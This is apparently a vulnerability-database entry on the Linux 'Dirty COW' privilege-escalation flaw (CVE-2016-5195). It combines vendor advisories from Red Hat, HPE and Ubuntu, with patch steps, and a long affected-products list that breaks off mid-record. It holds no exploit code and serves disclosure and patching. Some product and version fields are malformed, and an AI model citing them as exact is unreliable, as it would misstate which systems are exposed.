The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/

Copyright 2016 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1

iD8DBQFYEKKsXlSAg2UNWIIRAmI+AJkB5tkOU2r9pjWJ4cYCSD9mtyJFBwCgt+er yvfTfHwrbVXZfa/y1n2XeMs= =LaOt -----END PGP SIGNATURE-----

-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256

Note: the current version of the following document is available here: https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbgn03722en_us

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: hpesbgn03722en_us Version: 1

HPESBGN03722 rev.1 - HPE Operations Agent, Local Escalation of Privilege

NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.

Release Date: 2017-03-30 Last Updated: 2017-03-30

Potential Security Impact: Local: Escalation of Privilege

Source: Hewlett Packard Enterprise, Product Security Response Team

VULNERABILITY SUMMARY A security vulnerability in Linux kernel, also known as "Dirty COW", has been addressed in HPE Operations Agent. This vulnerability could be exploited locally to allow escalation of privilege.

References:

  • CVE-2016-5195 - Linux kernel vulnerability, Dirty "COW"

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.

  • HPE Operations agent software - v11.11, v11.12, v11.13, v11.14

BACKGROUND

CVSS Base Metrics ================= Reference, CVSS V3 Score/Vector, CVSS V2 Score/Vector

CVE-2016-5195
  7.8 CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
  7.2 (AV:L/AC:L/Au:N/C:C/I:C/A:C)

Information on CVSS is documented in
HPE Customer Notice HPSN-2008-002 here:

https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c01345499

RESOLUTION

HPE has made the following mitigation steps available to resolve the vulnerability in the impacted versions of HPE Operations Agent. Login to the Operations Agent system with root privileges
2. Update the system using 'yum update kernel' command 3. Reboot the server using '/sbin/shutdown -r now' command

Please contact HPE Technical Support if any assistance is needed regarding the mitigation steps.

HISTORY Version:1 (rev.1) - 30 March 2017 Initial release

Third Party Security Patches: Third party security patches that are to be installed on systems running Hewlett Packard Enterprise (HPE) software products should be applied in accordance with the customer's patch management policy.

Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HPE Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hpe.com.

Report: To report a potential security vulnerability for any HPE supported product: Web form: https://www.hpe.com/info/report-security-vulnerability Email: security-alert@hpe.com

Subscribe: To initiate a subscription to receive future HPE Security Bulletin alerts via Email: http://www.hpe.com/support/Subscriber_Choice

Security Bulletin Archive: A list of recently released Security Bulletins is available here: http://www.hpe.com/support/Security_Bulletin_Archive

Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB.

3C = 3COM 3P = 3rd Party Software GN = HPE General Software HF = HPE Hardware and Firmware MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PV = ProCurve ST = Storage Software UX = HP-UX

Copyright 2016 Hewlett Packard Enterprise

Hewlett Packard Enterprise shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett Packard Enterprise and the names of Hewlett Packard Enterprise products referenced herein are trademarks of Hewlett Packard Enterprise in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. ========================================================================== Ubuntu Security Notice USN-3104-1 October 20, 2016

linux vulnerability

A security issue affects these releases of Ubuntu and its derivatives:

  • Ubuntu 12.04 LTS

Summary:

The system could be made to run programs as an administrator.

Update instructions:

The problem can be corrected by updating your system to the following package versions:

Ubuntu 12.04 LTS: linux-image-3.2.0-113-generic 3.2.0-113.155 linux-image-3.2.0-113-generic-pae 3.2.0-113.155 linux-image-3.2.0-113-highbank 3.2.0-113.155 linux-image-3.2.0-113-omap 3.2.0-113.155 linux-image-3.2.0-113-powerpc-smp 3.2.0-113.155 linux-image-3.2.0-113-powerpc64-smp 3.2.0-113.155 linux-image-3.2.0-113-virtual 3.2.0-113.155

After a standard system update you need to reboot your computer to make all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have been given a new version number, which requires you to recompile and reinstall all third party kernel modules you might have installed. Unless you manually uninstalled the standard kernel metapackages (e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual, linux-powerpc), a standard system upgrade will automatically perform this as well

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201611-0386",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "redhat",
        "version": "5"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "3.5"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "3.13"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.0"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.2"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "3.11"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.8"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.1.35"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.7.9"
      },
      {
        "model": "enterprise linux aus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "6.2"
      },
      {
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "14.04"
      },
      {
        "model": "enterprise linux aus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "6.5"
      },
      {
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "16.10"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.5"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "debian",
        "version": "8.0"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "3.4.113"
      },
      {
        "model": "enterprise linux eus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "6.7"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "3.3"
      },
      {
        "model": "enterprise linux eus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "6.6"
      },
      {
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "12.04"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "3.2.83"
      },
      {
        "model": "enterprise linux aus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "6.4"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.22"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "3.18.44"
      },
      {
        "model": "enterprise linux long life",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "5.6"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "6.0"
      },
      {
        "model": "enterprise linux eus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.1"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "debian",
        "version": "7.0"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.4.26"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "3.17"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "3.16.38"
      },
      {
        "model": "enterprise linux long life",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "5.9"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "3.12.66"
      },
      {
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "16.04"
      },
      {
        "model": "enterprise linux tus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "6.5"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "3.19"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.8.3"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "3.10.104"
      },
      {
        "model": "paging server",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "5.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.62"
      },
      {
        "model": "msr95x",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "0.9.110.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.24.6"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.114"
      },
      {
        "model": "security guardium",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.1"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "6.1.11"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "6.1.15"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.1"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.117"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31.1"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1700.95"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.22"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "7.0.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.1"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.112"
      },
      {
        "model": "cloudengine v200r001sph002",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "huawei",
        "version": "8800"
      },
      {
        "model": "(comware r2122",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "79007)"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.46"
      },
      {
        "model": "identity manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "2.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.52"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28.4"
      },
      {
        "model": "email gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mcafee",
        "version": "7.6"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.89"
      },
      {
        "model": "video surveillance media server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.36"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.34.13"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.16"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.80"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.155"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.15"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.39"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.38.3"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.11.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.7.4"
      },
      {
        "model": "webex meetings server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "1.5.1.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.26.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.16"
      },
      {
        "model": "webex meetings server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "1.5.1.131"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.36"
      },
      {
        "model": "nexus",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6"
      },
      {
        "model": "(comware",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "59507)0"
      },
      {
        "model": "powerkvm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.1"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.25"
      },
      {
        "model": "ip interoperability and collaboration system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "cloudengine v100r005c00",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "huawei",
        "version": "7800"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.80"
      },
      {
        "model": "5130ei (comware",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7)0"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "6.1.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.12"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "7.0.10"
      },
      {
        "model": "edge digital media player",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "3400"
      },
      {
        "model": "enterprise linux client optional",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "7"
      },
      {
        "model": "cloudengine v100r003c10",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "huawei",
        "version": "12800"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.4"
      },
      {
        "model": "enterprise linux workstation",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.18.2"
      },
      {
        "model": "cloudengine v100r002c00",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "huawei",
        "version": "12800"
      },
      {
        "model": "linux cloudlinuxos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cloud",
        "version": "7"
      },
      {
        "model": "12900e",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "kernel 3.19-rc7",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.7"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.6.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.34.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31.6"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.27"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.170"
      },
      {
        "model": "pan-os",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "7.0.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.38.2"
      },
      {
        "model": "6127xlg",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "jabber guest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.65"
      },
      {
        "model": "vds recorder",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "vrealize operations",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "6.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.4"
      },
      {
        "model": "cloudengine v200r001c00",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "huawei",
        "version": "12800"
      },
      {
        "model": "visual quality experience server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "linux sparc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "junos space 15.1f2",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.24.4"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.32"
      },
      {
        "model": "pan-os",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "7.1.8"
      },
      {
        "model": "email gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mcafee",
        "version": "7.6.2"
      },
      {
        "model": "kernel 4.4-rc1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "vrealize automation",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "6.0"
      },
      {
        "model": "containers for linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "virtuozzo",
        "version": "4.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.24.3"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "16.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.45"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.42"
      },
      {
        "model": "ar3200 v200r006c15",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.31"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "coreos",
        "version": "1164.1"
      },
      {
        "model": "helion cloudsystem",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "8.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.5"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.121"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.88"
      },
      {
        "model": "kernel 4.1-rc6",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.48"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.3"
      },
      {
        "model": "cloudengine v100r006c00",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "huawei",
        "version": "8800"
      },
      {
        "model": "vrealize operations",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "6.3.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31"
      },
      {
        "model": "(comware",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "59307)0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.120"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.63-2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.7.9"
      },
      {
        "model": "linux enterprise server sp2 ltss",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.22"
      },
      {
        "model": "msr3000 (comware",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7)0"
      },
      {
        "model": "msr2000 (comware",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7)0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.10"
      },
      {
        "model": "enterprise linux hpc node eus",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "7.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.7.3"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.38"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.35.1"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.34"
      },
      {
        "model": "webex meetings server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "2.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.1.15"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.49"
      },
      {
        "model": "enterprise linux client",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.13.11"
      },
      {
        "model": "junos space 15.1r2.11",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.342"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.4"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.53"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.38.6"
      },
      {
        "model": "scos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.18.3"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.48"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.57"
      },
      {
        "model": "kernel 4.1-rc1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.48"
      },
      {
        "model": "linux",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "coreos",
        "version": "1192.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.37"
      },
      {
        "model": "kernel 3.14-rc4",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "coreos",
        "version": "1164.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.8.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.4"
      },
      {
        "model": "security guardium",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.5"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.16"
      },
      {
        "model": "enterprise linux hpc node eus",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "7.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
